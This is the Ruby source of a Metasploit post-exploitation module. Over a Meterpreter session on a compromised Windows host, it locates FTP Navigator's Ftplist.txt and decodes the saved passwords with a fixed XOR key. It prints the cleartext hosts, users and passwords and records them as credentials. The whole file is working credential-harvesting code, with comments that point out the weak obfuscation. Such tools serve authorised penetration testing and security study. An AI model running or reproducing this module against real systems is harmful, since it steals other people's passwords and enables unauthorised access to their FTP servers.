GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
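# Post module that reads FTP Navigator's Ftplist.txt over a Meterpreter
# session, decodes the saved passwords and records them as credentials.
#
# Defensive takeaway: the saved passwords are protected only by a
# single-byte XOR (see #decode_pass), so read access to Ftplist.txt is
# equivalent to access to the cleartext passwords.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
        'Description' => %q{
          This module extracts saved passwords from the FTP Navigator FTP client.
          It will decode the saved passwords and store them in the database.
        },
        'License' => MSF_LICENSE,
        'Author' => ['theLightCosine'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
            ]
          }
        }
      )
    )
  end

  # Locates Ftplist.txt, reads it through the session and reports every
  # non-anonymous entry that carries a saved password.
  #
  # The install directory comes from the InstallLocation value of the
  # product's Uninstall registry key, falling back to c:\FTP Navigator\.
  #
  # @return [void]
  def run
    key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\'
    val_name = 'InstallLocation'
    installdir = registry_getvaldata(key, val_name) || 'c:\\FTP Navigator\\'

    # Plain concatenation: assumes the registry value ends with a
    # backslash, like the fallback does -- TODO confirm.
    path = "#{installdir}Ftplist.txt"

    begin
      ftplist = client.fs.file.new(path, 'r')
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Unable to open Ftplist.txt: #{e}")
      print_error('FTP Navigator May not Be Installed')
      return
    end

    begin
      # to_s guards against a nil read (e.g. an empty file) so split does
      # not raise NoMethodError.
      lines = ftplist.read.to_s.split("\n")
    ensure
      # Release the remote file handle even when the read fails.
      ftplist.close
    end

    lines.each do |line|
      # Anonymous entries and entries without a saved password carry
      # nothing worth reporting.
      next if line.include?('Anonymous=1')
      next unless line.include?(';Password=')

      dpass = ''
      username = ''
      server = ''
      port = ''

      # Each entry is a run of ';'-separated key=value fields.
      line.split(';').each do |field|
        # 'SavePassword' also contains 'Password=', so skip it first.
        next if field.include?('SavePassword')

        if field.include?('Password=')
          epass = split_values(field)
          dpass = decode_pass(epass)
        elsif field.include?('User=')
          username = split_values(field)
        elsif field.include?('Server=')
          server = split_values(field)
        elsif field.include?('Port=')
          port = split_values(field)
        end
      end

      # The cleartext password goes to the console here and to the
      # database below; both outputs are sensitive.
      print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")

      # NOTE(review): server is taken verbatim from the file on the session
      # host and is resolved on the framework side; an unresolvable or empty
      # name presumably raises here and ends the loop -- confirm.
      service_data = {
        address: Rex::Socket.getaddress(server),
        port: port,
        protocol: 'tcp',
        service_name: 'ftp',
        workspace_id: myworkspace_id
      }

      credential_data = {
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: refname,
        username: username,
        private_data: dpass,
        private_type: :password
      }

      credential_core = create_credential(credential_data.merge(service_data))

      # Recorded as UNTRIED: the password is decoded from disk, not
      # verified against the FTP server.
      login_data = {
        core: credential_core,
        access_level: 'User',
        status: Metasploit::Model::Login::Status::UNTRIED
      }

      create_credential_login(login_data.merge(service_data))
    end
  end

  # Returns the value part of a "key=value" field.
  #
  # @param field [String] one ';'-separated field of an Ftplist.txt line
  # @return [String, nil] everything after the first '=', or nil when the
  #   field contains no '='
  def split_values(field)
    # Limit of 2 keeps any further '=' characters inside the value.
    field.split('=', 2)[1]
  end

  # Decodes a stored password by XORing every byte with 0x19.
  #
  # A fixed single-byte XOR is reversible obfuscation, not encryption: no
  # secret beyond the file contents is needed to recover the password.
  #
  # @param encoded [String] the encoded password as read from the file
  # @return [String] the decoded password
  def decode_pass(encoded)
    decoded = ''
    encoded.unpack('C*').each do |byte|
      # String#<< with an Integer appends it as a codepoint.
      decoded << (byte ^ 0x19)
    end
    decoded
  end
end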